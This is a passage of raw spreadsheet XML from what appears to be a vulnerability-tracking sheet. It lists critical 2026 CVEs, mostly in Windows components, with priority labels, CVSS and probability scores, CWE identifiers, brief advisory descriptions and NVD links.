t="n"><v>9.800000000000001</v></c><c r="E54" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F54" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G54" s="5" t="inlineStr" /><c r="H54" s="5" t="n"><v>0.016</v></c><c r="I54" s="5" t="inlineStr" /><c r="J54" s="5" t="inlineStr" /><c r="K54" s="5" t="inlineStr" /><c r="L54" s="5" t="inlineStr" /><c r="M54" s="5" t="inlineStr" /><c r="N54" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O54" s="5" t="inlineStr"><is><t>2026-08-27</t></is></c><c r="P54" s="5" t="inlineStr" /><c r="Q54" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R54" s="5" t="inlineStr"><is><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is></c><c r="S54" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-37003</t></is></c></row><row r="55"><c r="A55" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B55" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C55" s="5" t="inlineStr"><is><t>CVE-2026-37236</t></is></c><c r="D55" s="5" t="n"><v>9.800000000000001</v></c><c r="E55" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F55" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G55" s="5" t="inlineStr" /><c r="H55" s="5" t="n"><v>0.004</v></c><c r="I55" s="5" t="inlineStr" /><c r="J55" s="5" t="inlineStr" /><c r="K55" s="5" t="inlineStr" /><c r="L55" s="5" t="inlineStr" /><c r="M55" s="5" t="inlineStr" /><c r="N55" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O55" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P55" s="5" t="inlineStr" /><c r="Q55" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R55" s="5" t="inlineStr"><is><t>grpc-gatew</t></is></c><c r="S55" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-37236</t></is></c></row><row r="56"><c r="A56" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B56" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C56" s="5" t="inlineStr"><is><t>CVE-2026-49921</t></is></c><c r="D56" s="5" t="n"><v>9.800000000000001</v></c><c r="E56" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F56" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G56" s="5" t="inlineStr" /><c r="H56" s="5" t="n"><v>0.003</v></c><c r="I56" s="5" t="inlineStr" /><c r="J56" s="5" t="inlineStr" /><c r="K56" s="5" t="inlineStr" /><c r="L56" s="5" t="inlineStr" /><c r="M56" s="5" t="inlineStr" /><c r="N56" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O56" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P56" s="5" t="inlineStr" /><c r="Q56" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R56" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S56" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49921</t></is></c></row><row r="57"><c r="A57" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B57" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C57" s="5" t="inlineStr"><is><t>CVE-2026-52111</t></is></c><c r="D57" s="5" t="n"><v>9.800000000000001</v></c><c r="E57" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F57" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G57" s="5" t="inlineStr" /><c r="H57" s="5" t="n"><v>0.003</v></c><c r="I57" s="5" t="inlineStr" /><c r="J57" s="5" t="inlineStr" /><c r="K57" s="5" t="inlineStr" /><c r="L57" s="5" t="inlineStr" /><c r="M57" s="5" t="inlineStr" /><c r="N57" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O57" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P57" s="5" t="inlineStr" /><c r="Q57" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R57" s="5" t="inlineStr"><is><t>An issue in fast-note-sync-service &lt;=2.13.7 allows a remote attacker to escalate privileges via the admin configuration endpoint exposes authTokenKey</t></is></c><c r="S57" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52111</t></is></c></row><row r="58"><c r="A58" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B58" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C58" s="5" t="inlineStr"><is><t>CVE-2026-55559</t></is></c><c r="D58" s="5" t="n"><v>9.800000000000001</v></c><c r="E58" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F58" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G58" s="5" t="inlineStr" /><c r="H58" s="5" t="n"><v>0.006</v></c><c r="I58" s="5" t="inlineStr" /><c r="J58" s="5" t="inlineStr" /><c r="K58" s="5" t="inlineStr" /><c r="L58" s="5" t="inlineStr" /><c r="M58" s="5" t="inlineStr" /><c r="N58" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O58" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P58" s="5" t="inlineStr" /><c r="Q58" s="5" t="inlineStr"><is><t>CWE-1336, CWE-470, CWE-94</t></is></c><c r="R58" s="5" t="inlineStr"><is><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is></c><c r="S58" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55559</t></is></c></row><row r="59"><c r="A59" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B59" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C59" s="5" t="inlineStr"><is><t>CVE-2026-58240</t></is></c><c r="D59" s="5" t="n"><v>9.800000000000001</v></c><c r="E59" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F59" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G59" s="5" t="inlineStr" /><c r="H59" s="5" t="n"><v>0.003</v></c><c r="I59" s="5" t="inlineStr" /><c r="J59" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K59" s="5" t="inlineStr" /><c r="L59" s="5" t="inlineStr" /><c r="M59" s="5" t="inlineStr" /><c r="N59" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O59" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P59" s="5" t="inlineStr" /><c r="Q59" s="5" t="inlineStr"><is><t>CWE-308</t></is></c><c r="R59" s="5" t="inlineStr"><is><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is></c><c r="S59" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t></is></c></row><row r="60"><c r="A60" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B60" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C60" s="5" t="inlineStr"><is><t>CVE-2026-58822</t></is></c><c r="D60" s="5" t="n"><v>9.800000000000001</v></c><c r="E60" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F60" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G60" s="5" t="inlineStr" /><c r="H60" s="5" t="n"><v>0.003</v></c><c r="I60" s="5" t="inlineStr" /><c r="J60" s="5" t="inlineStr" /><c r="K60" s="5" t="inlineStr" /><c r="L60" s="5" t="inlineStr" /><c r="M60" s="5" t="inlineStr" /><c r="N60" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O60" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P60" s="5" t="inlineStr" /><c r="Q60" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="R60" s="5" t="inlineStr"><is><t>In multiple functions of ftsmooth.c, there is a possible memory safety issue due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S60" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58822</t></is></c></row><row r="61"><c r="A61" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B61" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C61" s="5" t="inlineStr"><is><t>CVE-2026-61516</t></is></c><c r="D61" s="5" t="n"><v>9.800000000000001</v></c><c r="E61" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F61" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G61" s="5" t="inlineStr" /><c r="H61" s="5" t="n"><v>0.004</v></c><c r="I61" s="5" t="inlineStr" /><c r="J61" s="5" t="inlineStr" /><c r="K61" s="5" t="inlineStr" /><c r="L61" s="5" t="inlineStr" /><c r="M61" s="5" t="inlineStr" /><c r="N61" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O61" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P61" s="5" t="inlineStr" /><c r="Q61" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R61" s="5" t="inlineStr"><is><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is></c><c r="S61" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61516</t></is></c></row><row r="62"><c r="A62" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B62" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C62" s="5" t="inlineStr"><is><t>CVE-2026-62916</t></is></c><c r="D62" s="5" t="n"><v>9.800000000000001</v></c><c r="E62" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F62" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G62" s="5" t="inlineStr" /><c r="H62" s="5" t="n"><v>0.006</v></c><c r="I62" s="5" t="inlineStr" /><c r="J62" s="5" t="inlineStr" /><c r="K62" s="5" t="inlineStr"><is><t>microsoft:entra_id</t></is></c><c r="L62" s="5" t="inlineStr" /><c r="M62" s="5" t="inlineStr" /><c r="N62" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O62" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P62" s="5" t="inlineStr" /><c r="Q62" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="R62" s="5" t="inlineStr"><is><t>Authentication bypass using an alternate path or channel in Microsoft Entra ID allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="S62" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62916</t></is></c></row><row r="63"><c r="A63" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B63" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C63" s="5" t="inlineStr"><is><t>CVE-2026-66302</t></is></c><c r="D63" s="5" t="n"><v>9.800000000000001</v></c><c r="E63" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F63" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G63" s="5" t="inlineStr" /><c r="H63" s="5" t="n"><v>0.005</v></c><c r="I63" s="5" t="inlineStr" /><c r="J63" s="5" t="inlineStr" /><c r="K63" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L63" s="5" t="inlineStr" /><c r="M63" s="5" t="inlineStr" /><c r="N63" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O63" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P63" s="5" t="inlineStr" /><c r="Q63" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R63" s="5" t="inlineStr"><is><t>External control of file name or path in Skype for Business allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S63" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66302</t></is></c></row><row r="64"><c r="A64" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B64" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C64" s="5" t="inlineStr"><is><t>CVE-2026-68839</t></is></c><c r="D64" s="5" t="n"><v>9.800000000000001</v></c><c r="E64" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F64" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G64" s="5" t="inlineStr" /><c r="H64" s="5" t="n"><v>0.008</v></c><c r="I64" s="5" t="inlineStr" /><c r="J64" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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4" s="5" t="inlineStr" /><c r="M64" s="5" t="inlineStr" /><c r="N64" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O64" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P64" s="5" t="inlineStr" /><c r="Q64" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="R64" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S64" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t></is></c></row><row r="65"><c r="A65" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B65" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C65" s="5" t="inlineStr"><is><t>CVE-2026-69276</t></is></c><c r="D65" s="5" t="n"><v>9.800000000000001</v></c><c r="E65" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F65" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G65" s="5" t="inlineStr" /><c r="H65" s="5" t="n"><v>0.008999999999999999</v></c><c r="I65" s="5" t="inlineStr" /><c r="J65" s="5" t="inlineStr" /><c r="K65" s="5" t="inlineStr" /><c r="L65" s="5" t="inlineStr" /><c r="M65" s="5" t="inlineStr" /><c r="N65" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O65" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P65" s="5" t="inlineStr" /><c r="Q65" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="R65" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft UxTheme Library (uxtheme.dll) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S65" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69276</t></is></c></row><row r="66"><c r="A66" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B66" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C66" s="5" t="inlineStr"><is><t>CVE-2026-69408</t></is></c><c r="D66" s="5" t="n"><v>9.800000000000001</v></c><c r="E66" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F66" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G66" s="5" t="inlineStr" /><c r="H66" s="5" t="n"><v>0.01</v></c><c r="I66" s="5" t="inlineStr" /><c r="J66" s="5" t="inlineStr" /><c r="K66" s="5" t="inlineStr" /><c r="L66" s="5" t="inlineStr" /><c r="M66" s="5" t="inlineStr" /><c r="N66" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O66" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P66" s="5" t="inlineStr" /><c r="Q66" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R66" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S66" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69408</t></is></c></row><row r="67"><c r="A67" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B67" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C67" s="5" t="inlineStr"><is><t>CVE-2026-69431</t></is></c><c r="D67" s="5" t="n"><v>9.800000000000001</v></c><c r="E67" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F67" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G67" s="5" t="inlineStr" /><c r="H67" s="5" t="n"><v>0.008999999999999999</v></c><c r="I67" s="5" t="inlineStr" /><c r="J67" s="5" t="inlineStr" /><c r="K67" s="5" t="inlineStr" /><c r="L67" s="5" t="inlineStr" /><c r="M67" s="5" t="inlineStr" /><c r="N67" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O67" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P67" s="5" t="inlineStr" /><c r="Q67" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R67" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S67" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69431</t></is></c></row><row r="68"><c r="A68" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B68" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C68" s="5" t="inlineStr"><is><t>CVE-2026-69463</t></is></c><c r="D68" s="5" t="n"><v>9.800000000000001</v></c><c r="E68" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F68" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G68" s="5" t="inlineStr" /><c r="H68" s="5" t="n"><v>0.008999999999999999</v></c><c r="I68" s="5" t="inlineStr" /><c r="J68" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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8" s="5" t="inlineStr" /><c r="M68" s="5" t="inlineStr" /><c r="N68" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O68" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P68" s="5" t="inlineStr" /><c r="Q68" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R68" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S68" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t></is></c></row><row r="69"><c r="A69" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B69" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C69" s="5" t="inlineStr"><is><t>CVE-2026-69491</t></is></c><c r="D69" s="5" t="n"><v>9.800000000000001</v></c><c r="E69" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F69" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G69" s="5" t="inlineStr" /><c r="H69" s="5" t="n"><v>0.008999999999999999</v></c><c r="I69" s="5" t="inlineStr" /><c r="J69" s="5" t="inlineStr" /><c r="K69" s="5" t="inlineStr" /><c r="L69" s="5" t="inlineStr" /><c r="M69" s="5" t="inlineStr" /><c r="N69" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O69" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P69" s="5" t="inlineStr" /><c r="Q69" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R69" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Microsoft DirectMusic allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S69" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69491</t></is></c></row><row r="70"><c r="A70" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B70" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C70" s="5" t="inlineStr"><is><t>CVE-2026-69493</t></is></c><c r="D70" s="5" t="n"><v>9.800000000000001</v></c><c r="E70" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F70" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G70" s="5" t="inlineStr" /><c r="H70" s="5" t="n"><v>0.01</v></c><c r="I70" s="5" t="inlineStr" /><c r="J70" s="5" t="inlineStr" /><c r="K70" s="5" t="inlineStr" /><c r="L70" s="5" t="inlineStr" /><c r="M70" s="5" t="inlineStr" /><c r="N70" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O70" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P70" s="5" t="inlineStr" /><c r="Q70" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="R70" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S70" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69493</t></is></c></row><row r="71"><c r="A71" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B71" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C71" s="5" t="inlineStr"><is><t>CVE-2026-69496</t></is></c><c r="D71" s="5" t="n"><v>9.800000000000001</v></c><c r="E71" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F71" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G71" s="5" t="inlineStr" /><c r="H71" s="5" t="n"><v>0.01</v></c><c r="I71" s="5" t="inlineStr" /><c r="J71" s="5" t="inlineStr" /><c r="K71" s="5" t="inlineStr" /><c r="L71" s="5" t="inlineStr" /><c r="M71" s="5" t="inlineStr" /><c r="N71" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O71" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P71" s="5" t="inlineStr" /><c r="Q71" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R71" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Compressed Folder allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S71" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69496</t></is></c></row><row r="72"><c r="A72" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B72" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C72" s="5" t="inlineStr"><is><t>CVE-2026-69525</t></is></c><c r="D72" s="5" t="n"><v>9.800000000000001</v></c><c r="E72" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F72" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G72" s="5" t="inlineStr" /><c r="H72" s="5" t="n"><v>0.01</v></c><c r="I72" s="5" t="inlineStr" /><c r="J72" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K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2" s="5" t="inlineStr" /><c r="M72" s="5" t="inlineStr" /><c r="N72" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O72" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P72" s="5" t="inlineStr" /><c r="Q72" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R72" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S72" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t></is></c></row><row r="73"><c r="A73" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B73" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C73" s="5" t="inlineStr"><is><t>CVE-2026-69579</t></is></c><c r="D73" s="5" t="n"><v>9.800000000000001</v></c><c r="E73" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F73" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G73" s="5" t="inlineStr" /><c r="H73" s="5" t="n"><v>0.01</v></c><c r="I73" s="5" t="inlineStr" /><c r="J73" s="5" t="inlineStr" /><c r="K73" s="5" t="inlineStr" /><c r="L73" s="5" t="inlineStr" /><c r="M73" s="5" t="inlineStr" /><c r="N73" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O73" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P73" s="5" t="inlineStr" /><c r="Q73" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R73" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S73" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69579</t></is></c></row><row r="74"><c r="A74" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B74" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C74" s="5" t="inlineStr"><is><t>CVE-2026-69586</t></is></c><c r="D74" s="5" t="n"><v>9.800000000000001</v></c><c r="E74" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F74" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G74" s="5" t="inlineStr" /><c r="H74" s="5" t="n"><v>0.01</v></c><c r="I74" s="5" t="inlineStr" /><c r="J74" s="5" t="inlineStr" /><c r="K74" s="5" t="inlineStr" /><c r="L74" s="5" t="inlineStr" /><c r="M74" s="5" t="inlineStr" /><c r="N74" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O74" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P74" s="5" t="inlineStr" /><c r="Q74" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R74" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows PDF allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S74" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69586</t></is></c></row><row r="75"><c r="A75" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B75" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C75" s="5" t="inlineStr"><is><t>CVE-2026-69590</t></is></c><c r="D75" s="5" t="n"><v>9.800000000000001</v></c><c r="E75" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F75" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G75" s="5" t="inlineStr" /><c r="H75" s="5" t="n"><v>0.01</v></c><c r="I75" s="5" t="inlineStr" /><c r="J75" s="5" t="inlineStr" /><c r="K75" s="5" t="inlineStr" /><c r="L75" s="5" t="inlineStr" /><c r="M75" s="5" t="inlineStr" /><c r="N75" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O75" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P75" s="5" t="inlineStr" /><c r="Q75" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R75" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="S75" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69590</t></is></c></row><row r="76"><c r="A76" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B76" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C76" s="5" t="inlineStr"><is><t>CVE-2026-69595</t></is></c><c r="D76" s="5" t="n"><v>9.800000000000001</v></c><c r="E76" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F76" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G76" s="5" t="inlineStr" /><c r="H76" s="5" t="n"><v>0.011</v></c><c r="I76" s="5" t="inlineStr" /><c r="J76" s="5" t="inlineStr" /><c r="K76" s="5" t="inlineStr" /><c r="L76" s="5" t="inlineStr" /><c r="M76" s="5" t="inlineStr" /><c r="N76" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O76" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P76" s="5" t="inlineStr" /><c r="Q76" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R76" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S76" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69595</t></is></c></row><row r="77"><c r="A77" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B77" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C77" s="5" t="inlineStr"><is><t>CVE-2026-69715</t></is></c><c r="D77" s="5" t="n"><v>9.800000000000001</v></c><c r="E77" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F77" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G77" s="5" t="inlineStr" /><c r="H77" s="5" t="n"><v>0.01</v></c><c r="I77" s="5" t="inlineStr" /><c r="J77" s="5" t="inlineStr" /><c r="K77" s="5" t="inlineStr" /><c r="L77" s="5" t="inlineStr" /><c r="M77" s="5" t="inlineStr" /><c r="N77" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O77" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P77" s="5" t="inlineStr" /><c r="Q77" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="R77" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Direct Show allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S77" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69715</t></is></c></row><row r="78"><c r="A78" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B78" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C78" s="5" t="inlineStr"><is><t>CVE-2026-69730</t></is></c><c r="D78" s="5" t="n"><v>9.800000000000001</v></c><c r="E78" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F78" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G78" s="5" t="inlineStr" /><c r="H78" s="5" t="n"><v>0.011</v></c><c r="I78" s="5" t="inlineStr" /><c r="J78" s="5" 